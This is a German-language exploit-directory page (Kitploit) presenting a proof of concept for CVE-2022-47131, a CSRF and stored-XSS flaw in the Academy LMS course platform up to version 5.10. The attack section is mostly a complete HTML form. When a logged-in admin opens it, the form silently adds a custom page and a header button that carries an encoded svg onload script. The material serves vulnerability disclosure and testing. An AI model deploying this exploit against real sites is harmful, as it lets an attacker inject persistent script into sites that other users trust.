Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-47131 — Academy LMS <= 5.10 CSRF / XSS | Kitploit
Tools/GitHubGitHub/openxp-research/cve-2022-47131
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubopenxp-research/cve-2022-47131

CVE-2022-47131

Academy LMS <= 5.10 CSRF / XSS

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-47131

Academy LMS <= 5.10 CSRF / XSS

Beschreibung

Academy LMS ist eine Anwendung, in der Personen Kurse erstellen und bewerben können. Die Funktion zum Hinzufügen einer neuen Seite ist anfällig für CSRF, da es kein Token gibt, das diesen Angriff verhindert. Zusätzlich kann diese Seite genutzt werden, um ein gespeichertes XSS-Payload zu laden.

Proof of Concept (POC)

Der erste Schritt unseres Proof of Concept ist die Authentifizierung auf der Plattform mit einem administrativen Benutzer.

Danach rufen Sie einfach die Seite auf, die den Code zur Ausnutzung der Schwachstelle enthält. Beachten Sie, dass ein neuer Button auf der Startseite der Website hinzugefügt wird, der zu einer XSS-Seite weiterleitet.

Verwendeter Code im Exploit:

root@kitploit:~
<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/custom_page/add" method="POST">
       <input type="hidden" name="page&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="page&#95;content" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;domain&#41;&#59;&gt ;" />
       <input type="hidden" name="files" value="" />
       <input type="hidden" name="button&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="button&#95;position" value="header" />
       <input type="hidden" name="page&#95;url" value="xss" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
Tool herunterladen